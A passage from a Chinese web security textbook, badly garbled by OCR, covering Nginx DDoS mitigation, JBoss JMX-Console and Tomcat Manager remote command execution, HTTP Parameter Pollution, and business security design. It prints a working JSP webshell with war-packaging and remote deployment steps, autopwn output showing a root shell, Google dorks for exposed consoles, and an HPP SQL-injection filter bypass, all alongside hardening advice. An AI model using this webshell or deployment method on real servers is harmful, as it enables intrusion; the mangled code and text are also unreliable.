首先 ，Nginx 的 配置 非常 灵活 ， 在 对 抗 DDOS 和 CC 攻击 方面 也 能 起 到 
一 定 的 缓解 作用 ， 比 如 下 面 的 一 些 配 置 参 数 : 


worker_pr 


Ocesses 1; 

worker rlimit nofile 80000; 
vents ( 

worker connections 50000; 
ion on; 

© default 


c 
listen  xx.xx.xx.xx:8 
rcvbuf=8192 sndbuf-16384 backlog-32000 
accept filter-httpready; 


其 次 ， 在 Nginx 配 置 中 还 可 以 做 一 些 简单 的 条 件 判 断 ， 比 如 客户 端 
User-Agent 具 有 什么 特征 ， 或 者 来 目 某 个 特定 referer、 卫 等 条 件 ， 啊 应 
动作 可 以 是 返回 错误 号 ， 或 进行 重 定向 。 


set $add 1; 
loca 


tion /index.php { 
limit_except GET POST { 
deny all; 


set $ban ""; 
if ($http_referer = "" ) {set 
$ban $ban$add; } 
if ($request_method = POST ) 
{set $ban $ban$add; } 
i $query_string = 
"action-login" ){set $ban $ban$add; } 
if ($ban = 111 ) 
access_log /var/log/ 
[133]nginx/ban IP; 
return 404; 


proxy_pass 
http://127.0.0.1:8000; #here is a patch 
} 


在 此 仍 需 强调 的 是 ，Web Server 对 于 DDOS 攻 击 的 防御 作用 是 有 限 的 。 
对 于 大 规模 的 拒绝 服务 攻击 ， 需 要 使 用 更 加 专业 的 保护 方案 。 


15.3”jBoss 远 程 命令 执行 

jBoss 是 J2EE 环 境 中 一 个 流行 的 Web 容 器 ， 但 是 jBoss 在 默认 安装 时 提供 
aa 如 有 果 配 置 不 得 当 ， 则 可 能 直接 造成 远程 命令 

行 。 

由 于 jBoss 在 默认 安装 时 会 有 一 个 管理 后 台 ， 叫 做 JMX-Console， 它 提供 
给 管理 员 一 些 强 大 的 功能 ， 其 中 包括 配置 MBeans， 这 同样 也 会 为 黑客 
们 打开 方便 之 门 。 通 过 8080 端 口 (默认 安装 时 会 监听 8080 端 口 ) Ui 
问 /jmx-console 能 够 进入 到 这 个 管理 界面 。 默 认 安 装 时 访问 JMX-Console 
是 没有 任何 认证 的 。 


< | @ http://victim:8080/jmx-console/ ©) IG Google q 


[3.4 | 
Heos] JMX Agent View 


ObjectName Filter (e.g, "jboss:*", "*:service-nvoker,*" ) [ _ApplyFilter 


Catalina 


© typewServer 
* type=StringCache 


JMImplementation 


è nameeDefault.serviceeLoaderRepository 
* type=MBeanRegistry 
. 


jboss 


* database*localDB.servicesHypersonic 

@ name=PropertyEditorManager.type=Service 
* name=Syste es type=Service 

. vi 

* service=AmributePersistenceService 

* serviceeClientUserTransaction 

è zervicezJNDIView 

* servicozK neratorf actoi HiLo 


JMX-Console 页 面 

在 JMX-Console 中 ， 有 多 种 可 以 远程 执行 命令 的 方法 。 最 简单 的 方式 ， 
是 通过 DeploymentScanner 远 程 加 载 一 个 war 包 。 

SA 认 的 DeploymentScaner 将 检 # URL 是 f 是 
file:/[JBOSSHOME]/server/default/de-ploy/， 但 通过 addURL0O 方 法 却 可 以 
添加 一 个 远程 的 war 包 。 这 个 过 程 大 致 如 下 : 

首先 创建 一 个 合法 的 war 包 ， 除 了 可 执行 的 shell 外 ， 还 需要 带 上 相应 的 


meta data ° 


$ echo 'The JSP to execute the commands' 
$ cat >cmd.jsp 

<%@ page import="java.util.*, java.io.*"%> 
<% 

%> 

<HTML><BODY> 

Commands with JSP 


«FORM METHOD-"GET" NAME-"myform" ACTION=""> 
<INPUT TYPE="text" NAME="cmd"> 
<INPUT TYPE-"submit" VALUE="Send"> 


</FORM> 

<pre> 

<% 

if (request.getParameter("cmd") != null) { 
out.println("Command: " + 

request.getParameter("cmd") + "<BR>"); 
Process p - 

Runtime.getRuntime().exec(request.getParamete 

r("cmd")); 


OutputStream os - p.getOutputStream(); 
InputStream in = p.getInputStream(); 
DataInputStream dis = new 
DataInputStream(in); 
String disr - dis.readLine(); 
while ( disr != null ) { 
out.println(disr); 
disr - dis.readLine(); 


3 
} 
%> 
</pre> 
</BODY></HTML> 


$ echo 'The web.xml file in the WEB-INF 
directory configures the web application' 
$ mkdir WEB-INF 
$ cat >WEB-INF/web. xm 
<?xml version="1.0" ?> 
<web-app xmlns="http://java.sun.com/xml/ns/ 
j2ee" 
xmlns:xsi-"http://www.w3.0rg/2001/ 
XMLSchema-instance" 


xsi:schemaLocation-"http://java.sun.com/xml/ 


ns/j2ee 
http://java.sun.com/xml/ns/j2ee/web- 
app 2 4.xsd" 
versionz"2.4"» 
<servlet> 


<servlet -name>Command</servlet -name> 
<jsp-file>/cmd.jsp</jsp-file> 
</servlet> 

</web-app> 

$ echo 'Now put it into the WAR file' 

$ jar cvf cmd.war WEB-INF cmd.jsp 

$ echo 'Copy it on a web server where the 

Jboss server can get it' 

$ cp cmd.war /var/www/localhost/htdocs/ 


SA 后 使 用 DeploymentScanner , 访 问 http://[host]:8080/jmx- 
console/HtmlAdaptor?action=inspect MBean&name=jboss.deploy- 
ment:type=DeploymentScanner,flavor=URL ° 


A FAK | Q http://victim:8080/jmx-console/ 
* sar-consoie-mgr.sar 


jboss.deployer 
e service-BSHDeployer 
jboss.deployment 
flavor=URL type=DeploymentScanner 
jboss.ejk 


è persistencePolicy=database service=EJBTimerService 
è retryPolicy=fixedDelay service=EJBTimerService 


è service=EJBDeployer 
€ service=EJBTimerService 


接 下 来 调用 addURLO。 


© bl, rit 896) pas coron on dapt) a 


如 果 执 行 成 功 ， 则 将 返回 succsess 的 信息 。 
e. 


Back to Agent View — Backto MBean View — Reinvoke MBean Operation 


Operation completed m ithout a return value. 


当 DeploymentScanner 下 次 执行 时 ， 应 用 将 布 署 成 功 ， 这 个 过 程 一 般 用 
一 分 钟 左右 。 在 一 分 钟 后 ， 攻 击 者 的 webshell 被 布 署 成 功 。 


yore} Sc) |' @ http://victim:8080/cmd/cmd.jsp?cmdz id 


Send | 


Commands vith JSP 


Command: id 

uid-1003(j2ee) gid-1003(j2ee) groups-913í( ssh 10gin),1003(j2ee) 

除了 使 用 DelpymentScanner 远 程 布 署 war 包 外 ， 德 国 的 Redteam 安 全 小 组 
研究 发 现 ， 通 过 JMX-Console 提 供 的 BSH (Bean Shell) Deploy-ment 方 
法 ， 同 样 也 能 布 著 war 包 。BSH 能 够 执行 一 次 性 的 脚本 ， 或 者 创建 服 
务 ， 这 对 于 黑客 来 说 很 有 用 。 


? JBoss JMX Management Console - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 


QB- Q XC (oL htpi[192.168.1.2:8080/jmx-console/ 


| *. JBoss JMX Management Console | + 


jboss.console 


e sarzconsole-mgr.sar 


boss.deployer 


* service=BSHDeployer 


jboss.deploy ment 
e flavor" URL.typezDeploymentScanner 


执行 命令 的 思路 是 ， Dl a ment() 执 行 命 令 ， 通 常 是 
能 


在 /tmp 目 录 下 写 入 一 个 war 包 后 ， 再 通过 JMX- Console 的 布 署 功能 加 载 
此 war 包 。 


?) MBean Inspector - Mozilla Firefox 


File Edt View History Bookmarks Tools Help 


eG ~ Q X db X ohtpultS2.168.1.2:8080/imx-console/Htmlàdaptor?action-inspectMBean&name--iboss. deployer*i3Aserv 5 
Di Most Visited @ Getting Started R Latest H 

7, MBean Inspector 

void start() 

MBean Operation. 

[pi lorg. jboss.deployment.DeploymentInfo 


ParamValue 


ParamDescription 


a |[(no description) 


java.net.URL createScriptDeployment( ) 


MBean Operation. 


ParamType ramValue [ParamDescription 


5 1 java.lang. cT “Tk (no description) 
[p2 java.lang.String] — | k (no description) 


这 个 执行 过 程 在 此 不 再 性 述 。 


JMX-Console 为 黑客 大 开 方 便 之 门 ， 通 过 简单 的 “Google hacking”， 可 以 
ee -Console 的 网 站 ， 其 中 大 多 数 是 存在 漏 
(AJAY) ° 


allinurl:/jmx-console MBean - Google Search - Mozilla Firefox 


[he gdt wew History Bookmarks Tools tep 


(<) - Œ Xx dy Y mpm googe.co.ddithleenta m allia 3A9UZF jinx console Y MBeanbanetaetuaqefGaqie ac ods i ai 6f pe23e047872b349109 


$ allinurk/imx-console MBean - Go... i | 
Web images Videos Maps Nows Shopping Mail more v 


Google [allinurl-/jmx-console MBean | [ Search | Asvancea sanon 


Search © the web © pages from the UK 


Web Show options . Results 1 - 10 of about 8,470 for allinurl:/jmx-console MBean 


Management, JMX/JBoss] - Cannot view my MBean in JMX-console 
[Managernent, JMX/JBoss] - Cannot view my MBean in JMX-console. Jkashyap 25 February 
2005 06:59:11. | am registering a new MBean dynamically with the MBean ... 

qaix. corn/,../56-526-management-jmx-jboss-cannot-view my-mbean-in-jimx-consele- 

read. shtml - Cached 


MBean Inspector 

MBean Name: Domain Name: jboss.management.local. ServiceModule: console-mgr.sar 
JREESarver Local. name: jboss admin?63aservice963dPluginManagar ... 

bussit.turku fi/jmx-console/HtmlAdaptor?.. inspectMBean 
admin?5253aservice*6253dPluginManager*e2 C.J2EE Server63DLoc ，- Cached 


MEean Inspector 

MBean Name: Domain Name: jboss.management.local. ServiceModule: ojb-deployor.xrnl. 
name; jboss ejb*63aservice*53dE.IBTimerService. J2EEServer Local... 
portugal.strabon.orag/Jmx-console/HtmbAdaptor?...inspectMBean. 
xml*52Cj2eeType?530MBean?52Cname963Djboss. 


MBean Name: Domain Name: jboss.managemaent.local. SericeModule: jbossjca-service. xml 
name: jboss.jca963asermice*Ss3dConnectionFactoryDeployer s. 

192 73.224. 13/ mx -console/HtmiAdaptor?. inspectMBean 

xml952Cj2eeType?530MB ean?52Cname*63Djboss... - Cached 


MBean Name: Domain Name: jboss. management local, ServiceModule: console-mdar sar 
name: jboss. admin%3asemice %3dDeploymentFileRepository. J2EEServer: Local ... 
alejandria ufps edu co 81/jmx-console/HtmlAdaptor? , inspectMBean 
admin%253aservice%253dD eploymentF ileRepository$62CJ2E E Serv... « Cached 


通过 “Google hacking” 搜 索 存 在 jBoss 管 理 后 台 的 网 站 


因此 出 于 安全 防御 的 目的 ， 在 加 固 时 ， 需 要 删除 JMX-Console 后 台 ， 事 
实 上 ，jBoss 的 使 用 完全 可 以 不 依赖 于 它 。 要 移 除 JMX-Console， 只 需 
删 除 jmx-console.war 和 web-console.war Bl nf , 它们 分 别 位 于 
$JBOSS_HOME/server/all/deploy 和 $JBOSS_HOME/server/default/deploy 
目录 下 。 使 用 如 下 命令 删除 : 

cd $JBOSS HOME 

mv ./server /default/deploy/management/ 


web-console-default.bak 
bin/run.sh 


如 果 出 于 业务 需要 不 得 不 使 用 JMX-Console， 则 应 该 使 用 一 个 强壮 的 密 
码 ， 并 且 运 行 JMX-Con-sole 的 端口 不 应 该 面 同 整 个 Internet 开 放 。 


15.4 Tomcat 远 程 命令 执行 

Apache Tomcat 与 刘 oss 一 样 ， 默 认 也 会 运行 在 8080 端 口 。 它 提供 的 
Tomcat Manager 的 作用 与 JMX-Console 类 似 ， 管 理 员 也 可 以 在 Tomcat 
Man-ager 中 部 署 war 包 。 


Apache Tomcat/5.5,28 - Mozilla Firefox 


E GR dew Hey pohmaka Jod Hsp 


6 -C X 命 B] modis zo & «ie 


poche Tomeat/5.520 8 | 
Apache Tomcatib.5.28 


"ce Software Found 
http://www,apache.or 


If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations! 


As you may have guessed by now, this is the defaut Tomcat home page. I can be found on the local filosystem at 
SCATALINA HOME/webapps/ROOT/index.jsp 
where "SCATALINA, HOME" is the root of the Tomcat instalation directory. If you're seeing this page, and you dont think you should be, then either you're either à user Who | 


émved at new installation of Tomcat, or you're an administrator who hasn't got hismer setup quite right Providing the latter is the case, please refer to the Tomcat Documart 
more detailed setup and acminestration information than is found in the INSTALL file 


NOTE: This page is precompiled, If vou change it, this page will not change since it was compiled into a semet at build time. (See $CATALINA_HONE/ wabappa/ ROOT/UEB- 
INF/ web. xmt 45 to how it was mapped.) 


NOTE: For security reasons, using the administration webapp is restricted to users with role "admin", The manager webapp Is restricted to users with role 
"manager", Users are defined in SCATAL INA NONE/conf/comcat-users. xml 


Included with this release are a host of sample Servlets and JSPs [with associated source code), extensive documentation (including the Serdet 2.4 and JSP 2 0 API Java 
and an introductory guide to developing web applications 


Tomcat mailing ists are available at the Tomcat project web site: 


* users@tomcat.apache.org for general questions related to configuring and using Tomcat 
* dev@tomeat.apache.org for developers working on Tomcat 


Thanks for using Tomcat! 


Tomcat Manager [fii 


但 值得 庆 科 的 是 ，Tomcat Manager 布 署 war 包 需要 有 manager 权 限 ， 而 这 
一 权限 是 在 配置 文件 中 定义 的 。 一 个 典型 的 配置 文件 如 下 : 


[root@nitrogen conf]# cat tomcat-users.xml 
<?xml version='1.0' encoding-'utf-8'?» 
<tomcat -users> 
<role rolename="tomcat"/> 

«role rolename="rolei"/> 

<user username="tomcat" password="tomcat" 
roles="tomcat"/> 
«user username="both" password="tomcat" 
roles="tomcat, rolei"/> 

«user username="rolei" password="tomcat" 
roles="rolei"/> 
</tomcat -users> 
[root@nitrogen conf ]# 


由 管理 员 修改 此 文件 ， 定 义 出 manager 角 色 : 


«user username-"manager" password="!@m4n4g3r ! 
@#! " roles-"manager"/» 


但 是 ， 像 下 面 这 种 配置 ， 就 存在 安全 隐患 了 。 


[root@nitrogen conf]# cat tomcat-users.xml 
<?xml version='1.0' encoding-'utf-8'?» 
<tomcat -users> 

<role rolename="tomcat"/> 


«role rolename="rolei"/> 

«role rolename-"manager"/» 

«user username="tomcat" password="tomcat" 
roles="tomcat,manager"/> 

<user username="both" password="tomcat" 
roles="tomcat, rolei"/> 

«user username-"rolei1" password="tomcat" 
roles="rolei"/> 

</tomcat -users> 

[root@nitrogen conf ]# 


已 于 搂 将 tomcat 用 户 添加 为 manager 角 色 ， 而 tomcat 用 户 的 密码 很 可 能 是 
个 默认 密码 ， 这 种 配置 违背 了 “最 小 权限 原则 ”。 
AC 台 可 以 直接 上 传 war 包 .: 


D Apache 


Software Foundation 
http://www.apache.org/ 


Tomcat Web Application Manager 


OK 


Litt elcome 1o Tome OOOO — É'ó m 


Pe M lancar 


Context Path (optiona: | 
XML Configuration file URL 


WAR or Directory URL: | 


Select WAR file to upload 


Tomcat 管 理 后 A LEftwar&lAt 
当然 也 可 以 通过 脚本 自动 化 实现 这 一 切 。 


[root@attacker jboss-autopwn-new]# ./tomcat- 
autopwn-nix 192.168.1.2 8080 

2>/dev/null 

[x] Web shell enabled!!: 
http://192.168.1.2:8080/browser/browser .jsp 
[x] Running as user...: 

uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm) 
, 6(disk),10(wheel) 

, 6(disk),10(wheel) 

^C 

[root@attacker jboss-autopwn-new]# 


虽然 Tomcat 后 全 有 密码 认证 ， 但 笔者 仍然 强烈 建议 删除 这 一 后 台 ， 
为 攻击 者 可 以 通过 骏 力 破解 等 方式 获取 后 台 的 访问 权限 ， 从 安全 的 角 
度 看 ， 这 增加 了 系统 的 攻击 面 ， 得 不 偿 失 。 


15.5 HTTP Parameter Pollution 

在 2009 年 的 OWASP 大 会 上 ，Luca、Caret-toni 等 人 演示 了 这 种 被 称 为 
HPP 的 攻击 。 简 单 来 说 ， 就 是 通过 GET 或 POST 癌 服务 器 发 起 请 求 时 ， 
提交 两 个 相同 的 参数 ， 那 么 服务 絮 会 如 何 选 择 呢 ? 

比如 提交 : 

在 某 些 服务 端 环境 中 ， 会 只 取 第 一 个 参数 ; 而 在 另外 一 些 环 境 中 ， 比 
如 .net 环 境 中 ， 则 会 变 成 : 

这 种 特性 在 绕 过 一 些 服务 器 端的 逻辑 判断 时 ， 会 非常 有 用 。 

这 种 HPP 攻 击 ， 与 Web 服 务 器 环境、 服务 器 端 使 用 的 脚本 语言 有 关 。 
HPP 本 身 可 以 看 做 服务 器 端 软 件 的 一 种 功能 ， 参 数 选 择 的 顺序 是 由 服务 
亏 妆 软件 所 决定 的 。 但 是 正如 我 们 在 本 书 中 所 举 的 很 多 例子 一 样 ， 当 
程序 员 不 熟悉 软件 的 这 种 功能 时 ， 就 有 可 能 造成 误 用 ， 或 者 程序 逻辑 
涵盖 范围 不 人 够 全 面 ， 从 而 形成 漏洞 。 

比如 可 以 通过 HPP 混 消 参 数 ， 从 而 绕 过 Mod-Security 对 于 SQL 注入 的 检 
测 。 


-—- 


/index.aspx?page=select 1,2,3 from table where id=] Q 


TE i 
/index.aspx?page=select 1 &page=2,3 from table where id=1 p 
ud 在 测试 了 大 量 服务 器 软件 版 本 的 组 合 后 ， 整 理 出 下 表 ， 


HPP 这 一 问题 再 次 提醒 我 们 ， 设 计 安 全 方案 必须 要 熟悉 Web 技 术 方 方面 

面 的 细节 ， 才 不 至 于 有 所 下 漏 。 从 防范 上 来 看 ， 由 于 HPP 是 服务 器 软件 

20 m 所 以 只 需 在 具体 的 环境 中 注意 服务 器 环境 的 参数 取 值 顺 
i 


15.6 小结 

在 本 章 中 探讨 了 Web Server、Web 容 器 相关 的 安全 问题 。Web Server ^ 
Web 容 絮 是 Web 应 用 的 载体 ， 是 基础 ， 它 们 的 安全 与 否 将 直接 影响 到 
应 用 的 安全 性 。 

在 搭建 服务 絮 端 环境 时 ， 需 要 注音 最 小 权限 原则 ， 应 该 以 独立 的 低 权 
限 身 份 运行 Web 进 程 。 同 时 Web Server 的 一 些 参数 能 够 优化 性 能 ， 有 助 
于 绥 解 DDOS 攻 击 ， 在 实际 运用 时 可 以 酌情 使 用 。 

Web Server 本 号 的 漏洞 也 需要 时 刻 天 注 ， 而 有 些 Web 容 器 的 默认 配置 
甚至 可 能 还 会 成 为 弱点 ， 一 名 合格 的 安全 工程 师 应 该 熟知 这 些 问 题 。 


第 四 篇 互联 网 公司 安全 运营 
第 16 章 互联 网 业务 安全 


本 书 中 的 很 多 章节 都 是 在 探讨 Web 攻 击 技术 的 原理 和 解决 方案 。 但 对 
于 互联 网 公司 来 说 ， 个 别 漏洞 的 影响 也 许 是 可 以 接受 的 ， 真 正 难 以 接 
受 的 是 那些 影响 到 公司 发 展 的 安全 问题 。 而 业务 安全 问题 ， 受 害 者 往 
往 是 互联 网 公司 的 用 户 ， 攻 击 的 是 互联 网 公司 的 业务 。 业 务 安 全 问题 
往往 难以 根治 ， 是 公司 业务 发 展 的 阻力 ， 需 要 引起 重视 。 


16.31 产品 需要 什么 样 的 安全 

一 个 好 产品 应 该 具备 什么 样 的 特性 ? 很 多 人 都 有 自己 的 答案 。 比 如 去 
商场 选 购 一 台电 视 机 ， 一 般 会 T 功能 是 否 先 
进 、 硬 件 配 置 如 何 、 外 表 美 观 程 度 、 厂 商 的 口碑 、 和 售后 服务 的 质量 ， 
以 及 价格 。 专 业 的 买 家 ， 还 会 数 规格 上 的 细微 差别 ， 面 板 
接 颖 的 做 工 细 节 ， 以 及 噪音 和 环保 等 问题 。 

一 个 完整 的 产品 有 许多 特性 ， 互 联网 产品 亦 如 此 。 互 联网 产品 其 实 是 
网 站 提供 的 在 线 服务 ， 产 品 特性 包括 性 能 、 美 观 、 方便 性 等 方面 ， 同 
时 也 包括 安全 。 

- 般 来 说 ， 安 全 是 产品 的 一 个 特性 。 

安全 本 身 可 视 作 产品 的 一 个 组 成 部 分 。 一 个 好 的 产品 ， 在 设计 之 初 ， 
就 应 该 考虑 是 否 会 存在 安全 隐患 ， 从 而 提前 准备 好 对 策 。 将 安全 视 为 
产品 特性 ， 往 往 也 就 解决 了 业务 与 安全 之 间 的 矛盾 。 

其 实业 务 与 安全 之 间 本 来 是 没有 冲突 的 ， 出 现 冲 突 往往 是 因为 安全 方 
案 设 计 得 不 够 完美 。 比 如 安全 方案 的 实现 成 本 相对 较 高 ， 从 而 不 得 不 
牺牲 一 些 产品 功能 上 的 需求 ， 有 时 候 牺 牲 的 可 能 还 有 性 能 。 

曾经 有 一 位 安全 专家 ， 对 数 百 位 开发 者 进行 了 调研 ， 在 这 些 开 发 者 的 
眼中 ， 对 于 一 个 项 目 ， 影 响 因 素 的 优先 级 排序 分 别 是 

ru SPANIEN 

能 


) 
) 可 用 性 ; 
) 是 否 能 按 原 定 计 划 上 线 ; 
) 可 维护 性 ; 

o e 

可 以 看 到 ， 安 全 被 开发 者 放 在 了 第 6 位 置 上 ， 从 产品 的 角度 来 看 ， 这 也 
是 可 以 理解 的 。 

16.1.1 互联 网 产品 对 安全 的 需求 
ee uu 
谈 不 上 安全 性 的 ， 因 为 产品 本 身 可 能 都 已 经 无 法 存在 下 去 了 。 但 是 

一 个 产品 其 他 方面 都 做 得 很 好 的 时 候 ， 安 全 全 有 可 能 会 成 为 产品 的 一 » 
核心 竞争 力 ， 成 为 拉 开 产 品 与 竞争 对 手 之 间 差 距 的 秘密 武器 。 只 有 安 
全 也 做 得 好 的 产品 ， 才 能 成 为 真正 的 好 产品 。 

有 许多 这 样 的 例子 。 在 搜索 引擎 行业 ， 竞 争 一 直 非 常 激烈 。Yahoo 是 
搜索 引擎 的 巨头 ， 后 来 Ya-hoo 自 己 扶 植 起 来 的 Google 在 搜索 方面 反而 


( 
(3 
(4 
(5 
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超越 了 Yahoo。 这 些 搜索 引擎 ， 都 非常 重视 搜索 结果 的 安全 性 。Google 
与 Stopbadware 展 开 了 合作 ，Stopbadware 提 供 一 份 实 时 更 新 的 恶意 网 站 
列表 给 Google， 其 中 包括 了 挂 马 网 站 、 钓 鱼网 站 、 欺 诈 网 站 等 ; 而 
Google 则 根据 这 份 名 单 对 搜索 引擎 结 果 中 的 数据 进行 第 选 ， 过 滤 挥 不 
安全 的 结果 。Google 的 安全 团队 也 在 研究 恶意 网 址 识别 技术 ， 用 于 对 
搜索 结果 和 浏览 絮 进 行 保护 。 

搜索 结果 是 否 安全 ， 对 网 民 来 说 是 很 重要 的 ， 因 为 搜索 引擎 是 互联 网 
最 重要 的 一 个 门户 。 

在 曾经 发 生 的 一 些 欺诈 案件 中 ， 钓 鱼网 站 公然 出 现在 搜索 结果 中 ， 导 
致 很 多 用 户 上 当 受 统 。 钓 鱼网 站 、 欺 许 网 站 通常 使 用 一 些 搜 索引 擎 优 
化 (SEO) 技术 ， 来 提高 自 吴 在 搜索 结果 中 的 排名 ， 一 旦 被 搜索 引擎 
收 永 ， 就 可 以 更 有 效 地 传播 ， 骗 到 更 多 的 人 。 

而 挂 马 网 站 略 有 不 同 ， 挂 马 网 站 往往 是 黑客 入 侵 了 一 个 颇 受 欢迎 的 网 
站 之 后 ， 算 改 了 网 站 的 页 面 。 黑 客 在 网 页 中 植 入 一 段 攻击 代码 ， 试 图 
利用 浏 蜗 絮 的 漏洞 攻击 网 站 的 用 户 。 

挂 马 网 站 本 身 是 一 个 正常 的 网 站 ， 有 的 搜索 排 果 如 下 : 


此 次 研究 总 共 发 现 了 34627 个 恶意 网 站 ; 
每 1000 个 搜索 结 末 中 束 会 有 一 个 导向 恶意 网 站 ; 
每 5 个 搜索 主题 中 束 有 一 个 导 问 恶意 网 站 。 


除了 搜索 引擎 外 ， 电 子 邮 箱 领 域 的 竞争 也 凸显 了 安全 的 重要 性 。 在 电 
子 邮 箱 领 域 ， 最 重要 的 一 项 安全 特性 就 是 “ 反 垃 圾 邮件 ”。 

其 实 早 在 2006 年 ， 就 有 调查 显示 ， 当 时 的 中 国 互 联网 用 户 平 均 每 周 都 
会 收 到 19.94 封 垃圾 邮件 ， 而 垃圾 邮件 每 年 给 国民 经 济 融 来 大 约 63.8 亿 
元 的 损失 。 而 到 2008 年 ， 这 个 数字 显然 已 经 虽 几 何 基数 膨胀 到 了 一 个 
不 可 思议 的 境地 。 据 保守 估计 ， 仪 在 2007 年 ， 垃 圾 邮件 对 中 国 造 成 的 
直接 经 济 损失 就 达到 200 亿 元 ， 间 接 损失 更 是 超过 万 亿 。 而 为 了 处 理 垃 
圾 邮件 ， 中 国 每 个 用 户 平均 每 天 要 花费 36 分 钟 的 工作 时 间 。 

以 往 的 “垃圾 邮件 ”内 容 一 般 是 推广 和 广告 信息 ， 现 在 还 要 加 上 钓鱼 和 
其 诈 邮 件 。 邮 件 钓 鱼 、 邮 件 诈 骗 的 案件 已 经 屡见不鲜 ， 如 何 应 对 这 些 
业务 安全 问题 ， 也 是 很 有 挑战 的 工作 。 

目前 在 反 垃 圾 邮件 领域 ， 各 家 互联 网 公司 都 各 有 妙招 。 在 用 户 使 用 的 
电子 邮箱 中 ， 能 够 收 到 的 垃圾 邮件 多 少 ， 也 能 判断 出 各 个 互联 网 公司 


在 安全 实力 上 的 高 低 。 

推 而 广 之 ， 可 以 发 现 ， 在 互联 网 中 ， 一 个 成 熟 的 产品 几乎 必然 会 存在 

安全 性 方面 的 竞争 。IM、 微 博 、SNS、 论 坛 、P2P、 广 告 等 领域 ， 只 

要 有 利 可 图 ， 就 会 出 现 安 全 问题 ， 也 就 会 存在 安全 方面 的 竞争 。 出 现 

安全 性 竞争 ， 也 可 以 从 侧面 反映 出 一 个 领域 在 渐 趋 成 熟 。 

安全 性 做 得 好 的 产品 ， 对 于 用 户 来 说 可 能 不 会 有 什么 特别 的 感觉 ， 因 

为 坏人 、 坏 的 信息 已 经 被 处 理 掉 了 ; 相反 ， 如 果 产 品 安 全 没有 做 好 ， 

则 用 户 一 定 会 感受 到 : 垃圾 消息 泛 小、 骗子 满 地 跑 ， 这 些 业 务 安 全 的 

问题 会 带 来 糟糕 的 用 户 体验 ， 有 时 候 甚至 会 席 掉 一 个 新 兴 的 领域 。 

安全 是 产品 特性 的 一 个 组 成 部 分 ， 具 备 了 安全 性 ， 产 品 才 是 完整 的 ; 

安全 做 好 了 ， 产 品 最 终 才 能 真正 成 熟 。 

16.1.2 什么 是 好 的 安全 方案 

可 是 产品 需要 什么 样 的 安全 呢 ? 产品 在 选择 安全 方案 时 ， 往 往 会 面临 

很 多 选择 ， 这 时 候 又 该 如 何 取 人 金 呢 ? 

笔者 认为 ， 一 个 优秀 的 安全 方案 ， 除 了 可 以 有 效 地 解决 问题 以 外 ， 至 

少 还 必须 具备 两 个 条 件 : 

(D 良好 的 用 户 体验 ; 

(2) 优秀 的 性 能 。 

这 两 点 ， 也 往往 是 产品 对 安全 方案 所 提出 的 最 大 挑战 。 

假设 要 设计 一 个 安全 方案 ， 保 护 网 站 的 Web 登 录入 口 ， 如 何 着 手 呢 ? 

对 于 认证 ， 我 们 有 许多 选择 。 最 基本 的 做 法 是 使 用 用 户 名 和 密码 认 

证 ， 而 一 些 敏感 系统 可 能 会 选择 双 因 素 (Tow Factors) 认证 。 比 如 网 
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守信 验证 码 ” 等 业务 ， 就 都 属于 双 因 素 认证 ， 它 在 用 户 名 与 密码 之 外 再 

做 了 一 次 认证 。 

然而 ， 双 因素 认证 可 能 会 降低 用 户 体 验 ， 因 为 用 户 使 用 起 来 更 加 麻烦 

了 。 比 如 用 户 每 次 登录 时 ， 都 需要 接收 一 条 手机 短信 ， 将 短信 接收 到 

人 
情 bi 

目前 用 的 比较 多 的 双 因 素 认 证 方案 ， 都 或 多 或 少 地 存在 类 似 的 问题 。 

比如 ， 手 机 短信 有 一 个 到 达 率 的 问题 ， 有 些 国外 的 用 户 就 接收 不 到 手 

机 短信 ; “USE? > “SRP HOBIE RAL, RARE Wig ZS 

不 菲 的 花费 ;客户 端 证 书 则 需要 解决 不 同 浏览 器 、 不 同 操作 系统 的 兼 

容 问题 ， 以 及 证 书 的 过 期 与 更 新 也 不 是 件 容易 的 事情 。 


目前 的 双 因 素 认 证 方案 ， 提 高 了 用 户 的 使 用 门槛， 损失 了 部 分 用 户 体 
验 ， 远 远 不 如 一 个 用 户 名 和 密码 简单 。 因 此 ， 我 们 需要 慎重 使 用 双 因 
素 认 证 方案 。 一 般 来 说 ， 只 有 一 些 安全 要 求 非常 高 的 账户 ， 或 者 系统 
本 身 就 极其 敏感 的 地 方 ， 才 使 用 双 因 素 认 证 方案 。 

如 果 说 “ 双 因 素 认 证 ”可 能 会 降低 用 户 体验 ， 那 么 为 了 更 安全 ， 是 否 可 
以 考虑 让 用 户 把 密码 设置 得 复杂 一 些 呢 ? 比如 要 求 用 户 密码 必须 有 16 
位 ， 且 为 数字 、 字 和 母 、 特 殊 字符 的 不 同 组 合 。 

复杂 密码 安全 吗 ? 

设置 复杂 密码 也 是 一 种 糟糕 的 体验 。 有 些 非 活跃 用 户 ， 可 能 常常 会 忘 
记 一 个 非常 用 的 复杂 密码 ; 而 有 的 用 户 设置 了 一 个 自己 也 记 不 住 的 密 
码 后 ， 可 能 会 把 “ 记 不 住 的 密码 ”记录 在 便条 或 者 本 子 上 ， 甚 至 是 贴 在 
电脑 显示 器 上 ， 这 反而 导致 密码 泄露 的 可 能 性 提高 

其 实 设置 复杂 密码 的 初 囊 ， 是 担心 密码 会 被 攻击 者 猜 解 。 密 码 被 猜 解 
的 途径 有 很 多 种 ， 最 常见 的 是 暴力 破解 ， 其 次 是 密码 有 关联 性 ， 比 如 
密码 是 用 户 的 手机 号 码 、 生 日 等 。 所 以 “提高 密码 复杂 度 ” 这 个 安全 需 
求 ， 其 本 质 其 实 可 以 分 解 为 : 

(1) 如 何 对 抗暴 力 破解 ; 

(2) 如 何 防止 密码 中 包含 个 人 信息 。 

这 样 ， 设 计 安全 方案 的 思路 就 有 了 一 些 变化 。 

比如 可 以 在 登录 的 应 用 中 检测 暴力 破解 的 尝试 。 检 查 一 个 账户 在 一 段 
时 间 内 的 登录 失败 次 数 ， 或 者 检测 某 一 个 下地 址 在 一 段 时 间 内 的 登录 
行为 次 数 。 这 些 行为 都 是 比较 明显 的 暴力 破解 特征 。 暴 力 破解 往往 还 
借助 了 脚本 或 者 扫描 器 ， 那 么 在 检测 到 此 类 行为 后 ， 向 特定 客户 端 返 
回 一 个 验证 码 ， 也 可 以 有 效 地 缓解 暴力 破解 攻击 。 

如 何 防止 密码 中 包含 个 人 信息 呢 ? 在 用 户 注册 时 ， 可 以 收集 到 用 户 填 
